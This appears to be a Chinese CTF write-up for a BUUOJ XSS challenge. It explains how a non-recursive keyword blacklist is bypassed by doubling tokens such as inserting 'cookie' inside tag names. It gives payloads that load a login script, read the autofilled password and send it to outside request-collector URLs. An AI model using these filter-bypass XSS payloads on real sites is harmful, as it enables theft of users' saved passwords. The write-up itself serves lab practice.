前言
题解
login.js
if (document.cookie && document.cookie != '') {
var cookies = document.cookie.split('; ');
var cookie = {};
for (var i = 0; i < cookies.length; i++) {
var arr = cookies[i].split('=');
var key = arr[0];
cookie[key] = arr[1];
}
if(typeof(cookie['user']) != "undefined" && typeof(cookie['psw']) != "undefined"){
document.getElementsByName("username")[0].value = cookie['user'];
document.getElementsByName("password")[0].value = cookie['psw'];
}
}
有替换,但注意,这里用的是非递归思想,也就是说是黑名单里的单个元素进行循环替换,然后再进行下一个。这种情况就可以双写绕过。
<scriphostt>alert(1)</scriphostt>
感觉就应该是xss题目了。
加上login.js里的内容,大致就是读取cookies。
抄抄wp,利用http://http.requestbin.buuoj.cn/获取下请求
<input type="text" name="username">
<input type="password" name="password">
<script src="./js/login.js"></script>
<script>
var psw = document.getElementsByName("password")[0].value;
document.location="http://http.requestbin.buuoj.cn/1ihbkir1/?psw="+psw;
</script>
加个cookie绕过替换
<incookieput type="text" name="username">
<incookieput type="password" name="password">
<scrcookieipt scookierc="./js/login.js"></scrcookieipt>
<scrcookieipt>
var psw = docucookiement.getcookieElementsByName("password")[0].value;
docucookiement.locacookietion="http://http.requestbin.buuoj.cn/1ihbkir1/?psw="+psw;
</scrcookieipt>等了很久,还是没触发我的xss,无语了。
2021年9月12日12:28:43
靶机可连外网,直接用beeceptor吧
<incookieput type="text" name="username">
<incookieput type="password" name="password">
<scrcookieipt scookierc="./js/login.js"></scrcookieipt>
<scrcookieipt>
var psw = docucookiement.getcookieElementsByName("password")[0].value;
docucookiement.locacookietion="https://ad456g45asd.free.beeceptor.com/?psw="+psw;
</scrcookieipt>
![刷题笔记:[SUCTF 2018]annonymous](/medias/featureimages/5.jpg)
